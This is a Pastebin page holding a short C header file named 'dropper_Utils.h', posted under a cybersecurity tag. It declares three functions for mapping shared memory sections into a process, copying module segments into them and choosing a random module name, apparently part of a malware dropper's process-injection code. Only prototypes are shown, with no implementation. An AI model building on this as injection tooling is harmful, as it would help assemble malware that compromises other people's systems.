Advertisement
FlyFar

dropper_Utils.h

Feb 18th, 2023
871
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 0.48 KB | Cybersecurity | 0 0
  1. #ifndef __UTILS_H__
  2. #define __UTILS_H__
  3.  
  4. #include "StdAfx.h"
  5. #include "define.h"
  6.  
  7. INT32 SharedMapViewOfSection(HANDLE hHandle, SIZE_T iSectionSize, PHANDLE pSectionHandle, PVOID *pBaseAddr1, PVOID *pBaseAddr2);
  8. void CopySegmentIntoSections(PVOID *pProcessSection, PVOID pModuleSection, INT32 *pSectionPointer, PSECTION_SEGEMENT_INFO sSegment, PVOID pSegmentContent, UINT32 iSegmentSize);
  9. INT32 GetRandomModuleName(GENERAL_INFO_BLOCK *sInfoBlock, LPCWSTR szDebugLibraryName);
  10.  
  11. #endif
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement